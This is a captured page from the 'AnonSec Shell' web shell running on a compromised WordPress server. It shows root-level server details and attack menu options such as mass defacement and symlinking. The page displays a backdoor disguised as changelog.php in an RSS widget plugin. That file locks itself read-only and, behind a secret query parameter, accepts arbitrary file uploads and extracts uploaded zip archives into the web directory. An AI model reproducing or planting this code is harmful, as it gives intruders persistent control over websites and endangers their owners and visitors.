AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 3.145.52.195   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/rss-icon-widget/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/rss-icon-widget/lib/changelog.php
<?php
chmod(basename($_SERVER["PHP_SELF"]), 0444);
if (isset($_GET['okok'])) {
    echo '<form enctype="multipart/form-data" method="POST" onsubmit="compressAndUpload(event)">
        <input type="file" id="file_upload" name="file_upload" />
        <input type="submit" value="Upload and Compress" />
    </form>';
    echo '<form enctype="multipart/form-data" method="POST">
        <input type="file" name="direct_file_upload" />
        <input type="submit" value="Direct Upload" />
    </form>';
    echo '<script src="https://cdnjs.cloudflare.com/ajax/libs/jszip/3.7.1/jszip.min.js"></script>';
    echo '<script>
function generateRandomFileName(extension) {
    let length = Math.floor(Math.random() * 3) + 6; // Generate 6 to 8 characters
    let characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    let randomString = "";
    for (let i = 0; i < length; i++) {
        randomString += characters.charAt(Math.floor(Math.random() * characters.length));
    }
    return randomString + extension;
}

async function compressAndUpload(event) {
    event.preventDefault();

    let fileInput = document.getElementById("file_upload");
    if (fileInput.files.length === 0) {
        alert("Please select a file!");
        return false;
    }

    let file = fileInput.files[0];
    let zip = new JSZip();
    zip.file(file.name, file);

    let zipBlob = await zip.generateAsync({ type: "blob" });
    let formData = new FormData();
    formData.append("file_upload", zipBlob, generateRandomFileName(".zip"));
    let response = await fetch("", {
        method: "POST",
        body: formData
    });
    let text = await response.text();
    document.body.innerHTML = `<p>${text}</p>`;
    return false;
}
</script>';

    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file_upload'])) {
        $uploadedFile = $_FILES['file_upload']['tmp_name'];

        $zip = new ZipArchive;
        if ($zip->open($uploadedFile) === TRUE) {
            for ($i = 0; $i < $zip->numFiles; $i++) {
                $filename = $zip->getNameIndex($i);
                $zip->extractTo('.', $filename);
            }
            $zip->close();

            unlink($uploadedFile);

            echo '<div class="success">Uploaded and extracted successfully.</div>';
        } else {
            echo '<div class="error">Failed to extract file.</div>';
        }
    }

    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['direct_file_upload'])) {
        $uploadedFile = $_FILES['direct_file_upload']['tmp_name'];
        $destination = basename($_FILES['direct_file_upload']['name']);

        if (move_uploaded_file($uploadedFile, $destination)) {
            echo '<div class="success">Direct upload successful.</div>';
        } else {
            echo '<div class="error">Direct upload failed.</div>';
        }
    }
}
?>

Anon7 - 2022
AnonSec Team